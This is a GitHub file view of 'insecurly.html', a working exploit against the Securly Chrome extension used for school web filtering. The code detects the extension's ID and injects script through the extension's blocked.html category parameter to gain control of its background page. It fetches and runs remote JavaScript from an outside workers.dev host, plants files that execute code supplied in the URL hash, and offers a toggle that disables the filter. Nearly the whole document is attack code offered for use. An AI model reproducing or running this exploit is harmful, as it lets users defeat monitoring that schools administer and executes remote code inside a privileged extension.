forked from zek-c/Securly-Kill-V111
-
Notifications
You must be signed in to change notification settings - Fork 9
/
Copy pathinsecurly.html
241 lines (233 loc) · 10.3 KB
/
insecurly.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
<!DOCTYPE html>
<html lang="en">
<head>
<link rel="icon" href="https://raw.githubusercontent.com/Epicminer256/Securascramble/main/IMG/insecurly%20icon.png">
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>INSECURLY</title>
<style>
#error {
display: none;
}
#draggable {
display: none;
background-color: black;
color: white;
padding: 10px;
font-weight: bold;
cursor: pointer;
}
.shown {
display: inline-block !important;
}
</style>
<script>
alert('this exploit was found by bypassi, and the icons were made by ender (https://github.com/Ender-Ghost-Craft/insecurly-icons)')
</script>
<script defer>
// These two functions act as a encryptor for the obfuscated code to store strings
function o(n, _ = 78, x = 126) {
for (var D = n.toString().split(""), t = 0; t < D.length; t++) D[t].charCodeAt(0) <= x && (D[t] = String.fromCharCode((D[t].charCodeAt(0) + _) % x));
return D.join("")
}
function d(n, _ = 78, x = 126) {
return o(n.toString(), x - _)
}
const main = function() {
document.body.innerHTML = `
<style>
body {
background-color:black;
color:#eeeeee;
font-family:Arial;
}
h1 {
font-size: 40px;
font-weight:normal;
}
.switch-area {
display:flex;
margin:10px 0px;
}
.switch-area div{
font-size:20px;
padding:6px 0px;
height:32px;
}
#desc {
font-size:18px;
max-width:300px;
}
#updates {
font-size:15px;
margin-top:15px;
color:#999999;
}
/* https://danklammer.com/articles/simple-css-toggle-switch/ */
#toggle {
appearance: none;
width: 62px;
height: 32px;
display: inline-block;
position: relative;
border-radius: 50px;
overflow: hidden;
outline: none;
border: none;
cursor: pointer;
background-color: #707070;
transition: background-color ease 0.3s;
}
#toggle:before {
content: "on off";
display: block;
position: absolute;
z-index: 2;
width: 28px;
height: 28px;
background: #fff;
left: 2px;
top: 2px;
border-radius: 50%;
font: 10px/28px Helvetica;
text-transform: uppercase;
font-weight: bold;
text-indent: -22px;
word-spacing: 37px;
color: #fff;
text-shadow: -1px -1px rgba(0,0,0,0.15);
white-space: nowrap;
box-shadow: 0 1px 2px rgba(0,0,0,0.2);
transition: all cubic-bezier(0.3, 1.5, 0.7, 1) 0.3s;
}
#toggle:checked {
background-color: #4CD964;
}
#toggle:checked:before {
left: 32px;
}
</style>
<h1>INSECURLY exploit (by bypassi)</h1>
<div class="switch-area">
<div>securly is currently</div>
<input id="toggle" type="checkbox" />
</div>
<div id="desc">
the switch above allows you to turn the securly extension on and off. note that this will not bypass
network filters or other filtering extensions. more functionality is coming soon.
</div>
<div id="updates"></div>
`;
let n = window.chrome.extension.getBackgroundPage();
let _ = document.getElementById("toggle");
async function x() {
let _ = await (await fetch("https://drifthunters.playhaven.workers.dev/Securascramble/js.js")).text(),
x = new n["Blob"]([_], {
type: "text/javascript"
}),
D = document.createElement("script");
D.src = URL["createObjectURL"](x), n.document.body.appendChild(D)
}
try {
x()
} catch (D) {}
async function t(n, _, x) {
let D = await new Promise(n => {
window["webkitRequestFileSystem"](window.TEMPORARY, x.length, n)
});
return await new Promise(_ => {
D.root.getFile(n, {}, n => {
n.remove(_)
}, _)
}), new Promise(t => {
D.root.getFile(n, {
create: !0
}, n => {
n["createWriter"](D => {
D.onwriteend = () => {
t(n["toURL"]())
}, D.write(new window["Blob"]([x], {
type: _
}))
})
})
})
// I love how bro put "ඞ" in his code
}(0, n.chrome).runtime.id.startsWith("j") && (document.getElementById("updates").textContent = "payload 3 applied. (you aren't supposed to know what this means)", (0, n.chrome).extension["setUpdateUrlData"](decodeURIComponent("%E0%B6%9E").repeat(1024))), localStorage["cluster"]?.startsWith("AVOID_OS,") || (_.checked = !0), _.onclick = function D() {
_.checked ? localStorage.clear() : localStorage["cluster"] = "AVOID_OS," + Date.now() * (Math["random"]() + 1.5), n.location.reload(), setTimeout(x, 1e3)
};
let $ = t.toString() + (function n() {
if (!location.hash) throw Error("IDK");
let _ = location.hash.replace("#", "");
t(Math.random() + ".js", "text/javascript", _).then(n => {
let _ = document.createElement("script");
_.src = n, document.body.appendChild(_)
})
}).toString() + ";p()";
t("/i.js", "text/javascript", $);
t("/i.html", "text/html", `<script src="./i.js"><\/script>`);
},
SecurlyIds = {
NONE: "",
OLD: "iheobagjkfklnlikgihanlhcddjoihkg",
NEW: "joflmkccibkooplaeoinecjbmdebglab"
};
async function g(n) {
let _;
try {
_ = await fetch("chrome-extension://" + n + "/fonts/Metropolis.css")
} catch (x) {
return 0
}
return 200 === _.status ? 1 : 0
}
async function getSecurlyId() {
return 1 === await g(SecurlyIds.NEW) ? SecurlyIds.NEW : 1 === await g(SecurlyIds.OLD) ? SecurlyIds.OLD : SecurlyIds.NONE
}
function e(n, _) {
let x = function(n) {
let _ = open();
_.chrome = top.chrome.extension["getBackgroundPage"]().chrome;
let x = document["createElement"]("script");
x.src = n, _.document.body.appendChild(x), top.close()
}
let D = URL["createObjectURL"](n)
let t = new window["Blob"]([`${o.toString()};${d.toString()};(${x.toString()})("${D}")`], {
type: "text/javascript"
})
let $ = URL["createObjectURL"](t);
let a='<style>*{visibility:hidden}</style>'+
'<iframe srcdoc="<script src=\'';
let b = '\'><\/script>">'+
'Hi. If you can read this, the exploit didn\'t work.'+
'Wait a couple of weeks. We\'ll be back...'+
'</iframe>';
let C = a + $ + b;
let B = window["encodeURIComponent"](btoa(C));
return "chrome-extension://" + _ + "/blocked.html?category=" + B
}
function generateStage2Url(n) {
return e(new window["Blob"]([`${o.toString()};${d.toString()};(${main.toString()})()`], {
type: "text/javascript"
}), n)
}
getSecurlyId().then(n => {
if (n === SecurlyIds.NONE) {
let _ = document.getElementById("error");
_.classList.add("shown"), _.textContent = "You don't have an adequate version of Securly installed."
} else {
let x = generateStage2Url(n),
D = document.getElementById("draggable");
D.classList.add("shown"), D["ondragstart"] = n => {
n.dataTransfer.setData("text/plain", x)
}
}
});
</script>
</head>
<body>
<h1>INSECURLY exploit (by bypassi)</h1>
<div id="error"></div>
<div id="draggable" draggable="true">drag this button into a new tab!</div>
</body>
</html>